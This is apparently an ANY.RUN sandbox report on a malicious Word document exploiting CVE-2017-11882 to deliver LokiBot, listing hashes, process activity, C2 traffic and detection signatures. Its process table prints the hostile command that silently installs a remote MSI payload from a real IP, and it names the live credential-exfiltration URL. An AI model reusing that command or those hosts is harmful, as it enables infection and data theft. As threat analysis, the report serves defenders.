analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

a62aeff83232a0e58f5f8a5d4349377bb456c315ddd2afeeb1c8991b1c1c2998

Full analysis: https://app.any.run/tasks/48d5f323-2508-48a8-9b77-a797a284737f
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 15, 2018, 11:54:03
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
exploit
CVE-2017-11882
exe-to-msi
loader
lokibot
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF, LF line terminators
MD5:

3B044386D61EBB88E52FE7A333AC363F

SHA1:

81B2EC8CD681FF954F0BA3AE4FF041F494B3713B

SHA256:

A62AEFF83232A0E58F5F8A5D4349377BB456C315DDD2AFEEB1C8991B1C1C2998

SSDEEP:

768:QmKfcZpEHUqUisx+NLBcJBn6QzXk/IFKnm4gXoUHSYJ573p6SZHayALMfGze9VRe:Q4ZcUisxYtMoFafc

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 3172)
    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 3812)
    • Downloads executable files from IP

      • msiexec.exe (PID: 3524)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 3524)
    • Detected artifacts of LokiBot

      • MSIBF50.tmp (PID: 2664)
    • LOKIBOT was detected

      • MSIBF50.tmp (PID: 2664)
    • Connects to CnC server

      • MSIBF50.tmp (PID: 2664)
    • Actions looks like stealing of personal data

      • MSIBF50.tmp (PID: 2664)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • rundll32.exe (PID: 3780)
    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 3172)
    • Drop ExeToMSI Application

      • msiexec.exe (PID: 3524)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 3524)
      • MSIBF50.tmp (PID: 2664)
    • Loads DLL from Mozilla Firefox

      • MSIBF50.tmp (PID: 2664)
    • Creates files in the user directory

      • MSIBF50.tmp (PID: 2664)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 676)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 676)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 3524)
      • MSIBF50.tmp (PID: 3556)
    • Application was crashed

      • EQNEDT32.EXE (PID: 3172)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 3524)
    • Application was dropped or rewritten from another process

      • MSIBF50.tmp (PID: 3556)
      • MSIBF50.tmp (PID: 2664)
    • Application launched itself

      • MSIBF50.tmp (PID: 3556)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
8
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start rundll32.exe no specs winword.exe no specs eqnedt32.exe cmd.exe no specs msiexec.exe no specs msiexec.exe msibf50.tmp no specs #LOKIBOT msibf50.tmp

Process information

PID
CMD
Path
Indicators
Parent process
3780"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Local\Temp\a62aeff83232a0e58f5f8a5d4349377bb456c315ddd2afeeb1c8991b1c1c2998C:\Windows\system32\rundll32.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
676"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\a62aeff83232a0e58f5f8a5d4349377bb456c315ddd2afeeb1c8991b1c1c2998"C:\Program Files\Microsoft Office\Office14\WINWORD.EXErundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3172"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
3812cmd.exe & /C CD C: & msiexec.exe /i http://3.120.153.6/ues.msi /quiet C:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2452msiexec.exe /i http://3.120.153.6/ues.msi /quiet C:\Windows\system32\msiexec.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3524C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3556"C:\Windows\Installer\MSIBF50.tmp"C:\Windows\Installer\MSIBF50.tmpmsiexec.exe
User:
admin
Company:
Biacetyl4
Integrity Level:
MEDIUM
Exit code:
0
Version:
2.02.0008
2664C:\Windows\Installer\MSIBF50.tmp"C:\Windows\Installer\MSIBF50.tmp
MSIBF50.tmp
User:
admin
Company:
Biacetyl4
Integrity Level:
MEDIUM
Version:
2.02.0008
Total events
2 196
Read events
1 421
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
5
Text files
10
Unknown types
7

Dropped files

PID
Process
Filename
Type
676WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRB182.tmp.cvr
MD5:
SHA256:
3524msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF9850A3BC460F3489.TMP
MD5:
SHA256:
676WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1749977B-223C-4F27-8C26-2F6CA901043D}.tmp
MD5:
SHA256:
676WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1A806A50-253B-47D3-9214-724458C84156}.tmp
MD5:
SHA256:
3524msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF3DCBACBA491D8273.TMP
MD5:
SHA256:
3524msiexec.exeC:\Windows\Installer\MSIBAB9.tmpexecutable
MD5:0605E0DDFE80A7DA894B2C03083A8A04
SHA256:D49366986C641ED924BCA7F4BB90612EFB8772583D0ADAD0D1EDB8672CC5D045
2664MSIBF50.tmpC:\Users\admin\AppData\Roaming\F63AAA\A71D80.lck
MD5:
SHA256:
3524msiexec.exeC:\Users\admin\AppData\Local\Temp\History\History.IE5\index.datdat
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862
SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
3524msiexec.exeC:\Users\admin\AppData\Local\Temp\Cookies\index.datdat
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862
SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
676WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$2aeff83232a0e58f5f8a5d4349377bb456c315ddd2afeeb1c8991b1c1c2998pgc
MD5:1CD28830E401012DA1A610153D8F1994
SHA256:4A8A3884D69833568782FB9D7870B09357E695DB280D46B8BFB59A3BD6FACEC6
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
7
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3524
msiexec.exe
GET
200
3.120.153.6:80
http://3.120.153.6/ues.msi
US
executable
1.25 Mb
suspicious
2664
MSIBF50.tmp
POST
404
109.234.34.88:80
http://sahakyanshn.com/broker/five/fre.php
RU
text
15 b
malicious
2664
MSIBF50.tmp
POST
404
109.234.34.88:80
http://sahakyanshn.com/broker/five/fre.php
RU
text
15 b
malicious
2664
MSIBF50.tmp
POST
404
188.225.27.43:80
http://sahakyanshn.com/broker/five/fre.php
RU
binary
23 b
malicious
2664
MSIBF50.tmp
POST
404
109.234.34.88:80
http://sahakyanshn.com/broker/five/fre.php
RU
binary
23 b
malicious
2664
MSIBF50.tmp
POST
404
185.224.251.7:80
http://sahakyanshn.com/broker/five/fre.php
unknown
binary
23 b
malicious
2664
MSIBF50.tmp
POST
404
188.225.27.43:80
http://sahakyanshn.com/broker/five/fre.php
RU
binary
23 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2664
MSIBF50.tmp
109.234.34.88:80
sahakyanshn.com
Webzilla B.V.
RU
malicious
2664
MSIBF50.tmp
185.224.251.7:80
sahakyanshn.com
malicious
3524
msiexec.exe
3.120.153.6:80
US
suspicious
2664
MSIBF50.tmp
188.225.27.43:80
sahakyanshn.com
TimeWeb Ltd.
RU
malicious

DNS requests

Domain
IP
Reputation
sahakyanshn.com
  • 109.234.34.88
  • 188.225.27.43
  • 185.224.251.7
unknown

Threats

PID
Process
Class
Message
3524
msiexec.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Malicious behavior by evader Trojan.Script.Generic
3524
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable application_x-msi Download
3524
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
3524
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable ExeToMSI Download
2664
MSIBF50.tmp
A Network Trojan was detected
ET TROJAN LokiBot User-Agent (Charon/Inferno)
2664
MSIBF50.tmp
A Network Trojan was detected
ET TROJAN LokiBot Checkin
2664
MSIBF50.tmp
A Network Trojan was detected
ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1
2664
MSIBF50.tmp
A Network Trojan was detected
ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2
2664
MSIBF50.tmp
A Network Trojan was detected
MALWARE [PTsecurity] Loki Bot Check-in M2
2664
MSIBF50.tmp
A Network Trojan was detected
ET TROJAN LokiBot User-Agent (Charon/Inferno)
7 ETPRO signatures available at the full report
No debug info